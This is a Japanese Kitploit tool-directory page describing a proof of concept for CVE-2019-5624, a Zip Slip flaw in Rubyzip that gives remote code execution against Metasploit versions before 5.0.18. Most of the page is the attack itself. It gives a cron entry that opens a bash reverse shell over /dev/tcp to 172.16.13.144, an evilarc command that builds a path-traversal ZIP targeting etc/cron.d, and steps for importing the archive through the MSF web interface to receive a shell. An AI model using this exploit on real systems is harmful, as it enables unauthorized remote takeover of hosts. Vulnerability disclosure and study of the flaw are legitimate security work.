Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/voidsec/cve-2019-5624
エクスプロイトフレームワーク脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

Metasploit の CVE-2019-5624 脆弱性 (Rubyzip の安全でない ZIP 処理による RCE) の概念実証

リポジトリを見る
1357年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2019-5624

MetasploitのCVE-2019-5624脆弱性(Rubyzipの安全でないZIP処理によるRCE)の概念実証

はじめに

2019年2月、Rubyzipライブラリに新たな脆弱性を発見しました。この脆弱性により、攻撃者は安全でないZIP処理(Zip Slip)を悪用してリモートコマンド実行が可能になります。

この脆弱性は、Metasploitバージョン5.0.18未満の全バージョンを標的とするために利用されました Metasploit Wrap-Up

脆弱性の詳細を解説した詳細なブログ記事を作成しました。

POC

  • 以下の内容のファイルを作成します。
root@kitploit:~
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • パストラバーサルペイロードを含むZIPアーカイブを生成します。
root@kitploit:~
python evilarc.py exploit --os unix -p etc/cron.d/
  • 有効なMSFワークスペースをZIPファイルに追加します(MSFが展開できるようにするため。そうしないとZIPアーカイブの処理が拒否されます)。
  • 2つのリスナーを設定します。1つはポート4444、もう1つはポート4445(ポート4445のリスナーがリバースシェルを受け取ります)。
  • MSF Webインターフェイスにログインします。
  • 新しい「Project」を作成します。
  • 「Import」、「From file」を選択し、悪意のあるZIPファイルを選び、最後に「Import」ボタンをクリックします。
  • インポート処理が完了するのを待ちます。
  • リバースシェルを楽しんでください。

動画

ツールをダウンロード